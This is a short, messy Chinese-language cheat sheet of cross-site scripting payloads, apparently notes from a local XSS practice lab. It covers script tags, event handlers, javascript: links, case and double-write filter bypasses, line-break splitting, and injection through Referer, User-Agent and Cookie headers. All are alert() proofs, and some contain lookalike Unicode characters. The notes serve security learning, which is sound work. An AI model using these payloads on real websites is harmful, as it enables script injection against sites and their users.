很乱
1.<script>alert(1)</script>
2、"><script>alert(1)</script>
3、' οnchange='alert(1)' // html 事件 onchange-当元素改变时运行脚本
4、"οnchange='alert(1)' // html 事件
5、"><a href=" javascript:alert(1)" html a标签
6、“><a HREF=”javascript:alert(1)” html a标签的大小写转换
7、“><scrscriptipt>alert(1)</scrscriptipt> 双写绕过
8、Javascr
ipt:alert(1) 
 13是回车
9、Javascr
ipt:alert(‘http://’)
10、t_sort="type="button" οnfοcus="alert(1) onfocus-当窗口获得焦点时运行脚本
11、Referer传" type="button" οnclick="alert(1)
12、User agent传 "type="button" οnclick="alert(1)
13、Cookies传 user=" οnclick="alert(1)" type="text"
14、<img src=x οnlοad=alert(1)>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
' οnfοcus=javascript:alert('xss') >
' οnfοcus=javascript:alert('xss')//
' οnclick=javascript:alert('xss')//
" οnclick=javascript:alert('xss')//
"> <a href=javascript:alert('xss')>xss</a>//
"> <ScripT>alert('1')</ScRipT>
"> <a hrehreff=javascrscriptipt:alert('xss')>xss</a>//
"><sscriptcript>alert('xss')</sscriptcript>
javascript:alert(‘xss’) 转化为实体字符: javascript:alert('xss')
burp放包 Referer: " οnclick=javascript:alert(1) type="text"
hackbar:user-agent referer cookie " οnclick=javascript:alert(1) type="text"
' http://192.168.100.152:88/level1.php?name="><a href="javascript:alert(/xss/)">xss '
<a%0dhref='javas%0acript:alert(1)'>xss
<img%0asrc=1%0dοnerrοr=alert(1)>